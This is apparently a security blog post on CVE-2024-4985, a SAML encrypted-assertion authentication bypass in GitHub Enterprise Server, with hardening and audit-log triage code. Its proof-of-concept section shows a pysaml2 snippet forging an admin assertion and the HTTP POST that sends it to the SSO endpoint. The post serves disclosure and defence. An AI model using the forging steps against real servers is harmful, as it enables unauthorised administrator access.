In May 2024, a major security vulnerability was disclosed in GitHub Enterprise Server (GHES): CVE-2024-4985. This flaw specifically impacted instances using SAML Single Sign-On (SSO) with encrypted assertion support. The bug let threat actors easily bypass protections and gain full admin access—without ever authenticating.
This post breaks down how CVE-2024-4985 works, how an attacker could exploit it, and what you should do if you run GHES. We’ll also provide code snippets to show how an attack could occur and point you to official resources.
What Is This Vulnerability About?
In a nutshell:
If you used GitHub Enterprise Server (GHES) with SAML SSO and enabled *encrypted assertions* (an optional setting), attackers could craft a malicious SAML response. That response could provision new user accounts (including admins!) or access existing ones—*all without a valid login*.
> Affected versions:
> All versions prior to 3.13.
> Fixed in 3.9.15, 3.10.12, 3.11.10, 3.12.4, and 3.13.
How the Exploit Worked
SAML (Security Assertion Markup Language) is widely used for single sign-on authentication. It lets a central identity provider (IdP) assert that a user is who they say they are. In secure setups, the IdP signs and sometimes encrypts the authentication assertions.
In this case, GHES did not correctly verify that encrypted assertions had really been issued by the legitimate IdP. In other words: an attacker could create their *own* encrypted SAML assertions and the server accepted them as genuine.
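The failure described above is that a decrypted assertion was treated as trusted simply because it decrypted. Decryption proves nothing about origin: the service provider's encryption certificate is published in its metadata, so anyone can produce an assertion that decrypts cleanly. What proves origin is a signature from the IdP's pinned certificate that covers the assertion. The following is an added illustration written for this post, not GHES code or pysaml2 code: it contrasts a `vulnerable_accept` that trusts whatever parses with a `hardened_accept` that enforces issuer, signature presence, pinned signing certificate, signature reference, validity window and audience before honouring the NameID. The entity IDs, certificate strings and assertions are constructed, and the actual XML-DSig cryptographic verification is assumed to be delegated to a library such as xmlsec rather than implemented here.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

# Constructed service-provider settings (hypothetical values, not GHES configuration keys).
TRUSTED_IDP_ENTITY_ID = "https://idp.example.com/metadata"
TRUSTED_IDP_CERT_B64 = "MIIC-CONSTRUCTED-IDP-CERT"   # base64 DER cert pinned from IdP metadata
EXPECTED_AUDIENCE = "https://ghes.example.com"


def vulnerable_accept(decrypted_assertion_xml):
    """Models the flawed logic: anything that decrypted and parses is trusted,
    and the NameID inside it is used to look up or provision an account."""
    root = ET.fromstring(decrypted_assertion_xml)
    return root.findtext("saml:Subject/saml:NameID", namespaces=NS)


def hardened_accept(decrypted_assertion_xml, now):
    """Return (name_id, None) when every trust check passes, else (None, reason)."""
    root = ET.fromstring(decrypted_assertion_xml)
    if root.tag != "{%s}Assertion" % NS["saml"]:
        return None, "not a saml:Assertion"
    if root.findtext("saml:Issuer", namespaces=NS) != TRUSTED_IDP_ENTITY_ID:
        return None, "issuer is not the configured IdP"
    sig = root.find("ds:Signature", NS)
    if sig is None:
        return None, "assertion is unsigned"
    cert = sig.findtext("ds:KeyInfo/ds:X509Data/ds:X509Certificate", namespaces=NS) or ""
    if "".join(cert.split()) != TRUSTED_IDP_CERT_B64:
        return None, "signing certificate is not the pinned IdP certificate"
    ref = sig.find("ds:SignedInfo/ds:Reference", NS)
    if ref is None or ref.get("URI") != "#" + root.get("ID", ""):
        return None, "signature reference does not cover this assertion"
    # Assumed, not implemented: a real SP now hands `root` to an XML-DSig library
    # (e.g. xmlsec) to verify SignatureValue against TRUSTED_IDP_CERT_B64.
    cond = root.find("saml:Conditions", NS)
    if cond is None:
        return None, "missing Conditions"
    not_before, not_on_or_after = _ts(cond.get("NotBefore")), _ts(cond.get("NotOnOrAfter"))
    if not_before is None or not_on_or_after is None or not (not_before <= now < not_on_or_after):
        return None, "assertion outside its validity window"
    audiences = [a.text for a in cond.findall("saml:AudienceRestriction/saml:Audience", NS)]
    if EXPECTED_AUDIENCE not in audiences:
        return None, "audience does not include this SP"
    name_id = root.findtext("saml:Subject/saml:NameID", namespaces=NS)
    return (name_id, None) if name_id else (None, "missing NameID")


def _ts(value):
    """Parse a SAML xsd:dateTime such as 2024-05-21T12:00:00Z into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")) if value else None


def sample_assertion(issuer, signer_cert=None, name_id="alice@example.com"):
    """Build a constructed, minimal assertion for testing (no real cryptography)."""
    aid = "_id-constructed-1"
    signature = ""
    if signer_cert is not None:
        signature = (
            '<ds:Signature xmlns:ds="%s"><ds:SignedInfo><ds:Reference URI="#%s"/>'
            '</ds:SignedInfo><ds:SignatureValue>CONSTRUCTED</ds:SignatureValue>'
            '<ds:KeyInfo><ds:X509Data><ds:X509Certificate>%s</ds:X509Certificate>'
            '</ds:X509Data></ds:KeyInfo></ds:Signature>' % (NS["ds"], aid, signer_cert)
        )
    return (
        '<saml:Assertion xmlns:saml="%s" ID="%s" Version="2.0" IssueInstant="2024-05-21T11:59:00Z">'
        '<saml:Issuer>%s</saml:Issuer>%s'
        '<saml:Subject><saml:NameID>%s</saml:NameID></saml:Subject>'
        '<saml:Conditions NotBefore="2024-05-21T11:55:00Z" NotOnOrAfter="2024-05-21T12:05:00Z">'
        '<saml:AudienceRestriction><saml:Audience>%s</saml:Audience></saml:AudienceRestriction>'
        '</saml:Conditions></saml:Assertion>'
        % (NS["saml"], aid, issuer, signature, name_id, EXPECTED_AUDIENCE)
    )


NOW = datetime(2024, 5, 21, 12, 0, tzinfo=timezone.utc)
GENUINE = sample_assertion(TRUSTED_IDP_ENTITY_ID, TRUSTED_IDP_CERT_B64)
FORGED_UNSIGNED = sample_assertion(TRUSTED_IDP_ENTITY_ID, None, "newadmin@example.com")
FORGED_SELF_SIGNED = sample_assertion(TRUSTED_IDP_ENTITY_ID, "MIIC-ATTACKER-CERT", "newadmin@example.com")

if __name__ == "__main__":
    for label, xml in [("genuine", GENUINE), ("unsigned", FORGED_UNSIGNED), ("self-signed", FORGED_SELF_SIGNED)]:
        print(label, "| vulnerable ->", vulnerable_accept(xml), "| hardened ->", hardened_accept(xml, NOW))
```

The point of the contrast is that `vulnerable_accept` happily returns `newadmin@example.com` for both forged inputs, while `hardened_accept` stops at the first trust check that fails. The order of checks matters too: issuer and signature are verified before any attribute or subject is read, so nothing from an untrusted assertion influences account lookup or provisioning.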
The consequences?
Proof-of-Concept Attack
> Note: This is a simplified demonstration for educational purposes. Do *not* attack live systems.
Suppose we want to create a SAML response to trick a vulnerable GHES instance into granting admin rights.
Step 1. Forge a SAML Response
You could use Python with a SAML library (the snippet below uses pysaml2) to craft a self-signed, encrypted SAML assertion.
```python
from saml2.saml import Assertion, AuthnStatement, NameID, Subject
from saml2.s_utils import sid

# Create a fake assertion
assertion = Assertion()
assertion.id = sid()
# pysaml2 models the subject as a Subject element wrapping a NameID, not a bare string
assertion.subject = Subject(name_id=NameID(text='newadmin@example.com'))
# pysaml2 expects a list of AuthnStatement objects here, not a string
assertion.authn_statement = [AuthnStatement()]
# ... fill in details as needed ...
# Normally, this should be signed/encrypted by the IdP's key.
# Here, you just encrypt/sign it yourself.
# Serialize the assertion to an XML string (pysaml2 objects serialize with
# to_string(); they are not lxml elements, so etree.tostring() would fail)
assertion_xml = assertion.to_string().decode()
# Send this as part of a SAMLResponse to the GHES SSO endpoint
```
You post the SAML response to the GHES SSO endpoint, typically something like `https://ghes.example.com/sso/saml/consume`, including the fake SAML response as a POST form parameter:

```http
POST /sso/saml/consume HTTP/1.1
Host: ghes.example.com
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64-encoded-modified-assertion>
```
If the server is vulnerable, it accepts the assertion—provisioning your attacker-chosen account, possibly with administrator access.
1. Update Immediately
If you run any affected version before 3.13 and you use SAML with encrypted assertions, you’re at high risk. Upgrade to one of the fixed releases listed above (3.9.15, 3.10.12, 3.11.10, 3.12.4) or to 3.13 or later.
2. Audit Admin Accounts
Review your site admin accounts. The exploit could have provisioned a ‘ghost’ admin.
3. Review SAML Configuration
Understand your current SAML setup. If you *must* use encrypted assertions, make sure patches are applied.
4. Incident Response
If you suspect compromise, rotate secrets and keys used in SAML flows. Investigate logins and recent SAML trace logs.
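Steps 2 and 4 both come down to the same question: did an account appear or get promoted during the exposure window that your identity provider never issued? GHES keeps an audit log, and the triage below is an added example written for this post (not GitHub's tooling) that runs over a constructed sample of audit-log lines. The field names (`@timestamp` in epoch milliseconds, `action`, `actor`, `user`) and the action names `user.create` and `user.promote` are assumptions about the export format; the IdP directory, site-admin roster and exposure window are constructed reference data an incident responder would supply from outside the log.

```python
import json
from datetime import datetime, timezone

# Constructed audit-log sample. Field names and action names are assumed to
# mirror a GHES audit log export; every value is made up for this example.
SAMPLE_AUDIT_LOG = """\
{"@timestamp": 1716250000000, "action": "user.login", "actor": "alice", "user": "alice"}
{"@timestamp": 1716253000000, "action": "user.create", "actor": "system", "user": "newadmin"}
{"@timestamp": 1716253100000, "action": "user.promote", "actor": "newadmin", "user": "newadmin"}
{"@timestamp": 1716260000000, "action": "user.create", "actor": "alice", "user": "carol"}
{"@timestamp": 1716261000000, "action": "user.promote", "actor": "alice", "user": "carol"}
{"@timestamp": 1717000000000, "action": "user.create", "actor": "system", "user": "dave"}
"""

# Constructed reference data pulled from outside the audit log: the IdP's
# user directory export and the site-admin roster as of the window start.
KNOWN_IDP_USERS = {"alice", "carol", "dave"}
KNOWN_SITE_ADMINS = {"alice"}

# Hypothetical exposure window: from the last known-good state until the
# fixed release was installed on this instance.
WINDOW_START = datetime(2024, 5, 1, tzinfo=timezone.utc)
WINDOW_END = datetime(2024, 5, 22, tzinfo=timezone.utc)


def triage_audit_log(text):
    """Return (action, user, reason) for each in-window event that needs a human look."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ts = datetime.fromtimestamp(ev["@timestamp"] / 1000, tz=timezone.utc)
        if not (WINDOW_START <= ts < WINDOW_END):
            continue
        action, actor, user = ev.get("action"), ev.get("actor"), ev.get("user")
        if action == "user.create" and user not in KNOWN_IDP_USERS:
            # A forged assertion provisions an identity the IdP has no record of.
            findings.append((action, user, "account created for an identity the IdP does not know"))
        elif action == "user.promote":
            if actor not in KNOWN_SITE_ADMINS:
                # Promotion performed by someone who was not an admin at window start.
                findings.append((action, user, "promoted to site admin by %r, not a known admin" % actor))
            elif user not in KNOWN_IDP_USERS:
                findings.append((action, user, "unknown identity promoted to site admin"))
    return findings


def ghost_admin_candidates(findings):
    """Collapse findings to the set of usernames to review and, if unexplained, disable."""
    return sorted({user for _, user, _ in findings})


if __name__ == "__main__":
    for action, user, reason in triage_audit_log(SAMPLE_AUDIT_LOG):
        print("%-13s %-10s %s" % (action, user, reason))
    print("review:", ghost_admin_candidates(triage_audit_log(SAMPLE_AUDIT_LOG)))
```

Two design choices worth keeping when you adapt this to a real export: the window is bounded on both ends so you are not chasing legitimate onboarding that happened after the patch, and the reference sets come from the IdP and the admin roster rather than from the audit log itself, since an attacker who provisioned an admin could also have generated plausible-looking follow-on events.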
Reference Links
- GitHub Security Advisory: GHSA-wvpx-jhr9-h458
- GitHub Blog: Security Update (May 2024)
- NIST NVD (CVE-2024-4985)
Final Thoughts
CVE-2024-4985 is a critical reminder: even flagship products like GitHub Enterprise may have subtle authentication vulnerabilities, especially with complex SAML features. Attackers didn’t need to know user passwords or compromise the Identity Provider—just a slyly crafted SAML message, and they’re in.
If you run GitHub Enterprise Server, patch *right now*. This bug is easy to exploit, and patched updates are available for all major branches.
Stay safe!
*This vulnerability was responsibly reported through the GitHub Bug Bounty program. If you find issues in your own software, disclose them to the vendor before going public.*
Timeline
Published on: 05/20/2024 22:15:08 UTC
Last modified on: 11/21/2024 09:44:00 UTC